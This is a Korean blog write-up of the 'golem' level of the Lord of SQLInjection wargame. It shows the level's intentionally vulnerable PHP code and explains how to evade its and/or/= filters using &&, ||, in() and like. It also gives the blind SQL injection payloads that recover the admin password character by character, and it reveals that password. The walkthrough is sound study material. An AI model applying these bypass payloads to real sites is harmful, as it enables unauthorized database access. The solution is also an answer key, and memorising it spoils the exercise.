반응형
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
highlight_file(__FILE__);
?>Blind Sql Injection 문제.
여러 필터링들이 있다.
우회
and 필터링 -> &&
or 필터링 -> ||
= 필터링 -> in(), like
+ 참고 인코딩값
&& -> %26%26
|| -> %7C%7C
query : select id from prob_golem where id='guest' and pw='123' || id in('admin') && length(pw) like 8&& '1'
-> true
비밀번호 8자리.
query : select id from prob_golem where id='guest' and pw='123' || id in('admin') && ascii(right(left(pw,i),1)) like j && '1'
i = 1~8 , j = 아스키문자값들로 값을 바꿔주면서 전체 비밀번호를 알아낸다. (나는 프로그램을 돌렸다.)
query : select id from prob_golem where id='guest' and pw='77d6290b'
반응형
'[웹해킹] > [LOS]' 카테고리의 다른 글
| [LOS] BUGBEAR (0) | 2020.12.16 |
|---|---|
| [LOS] DARKKNIGHT (0) | 2020.12.15 |
| [LOS] SKELETON (0) | 2020.12.13 |
| [LOS] VAMPIRE (0) | 2020.12.13 |
| [LOS] TROLL (0) | 2020.12.13 |
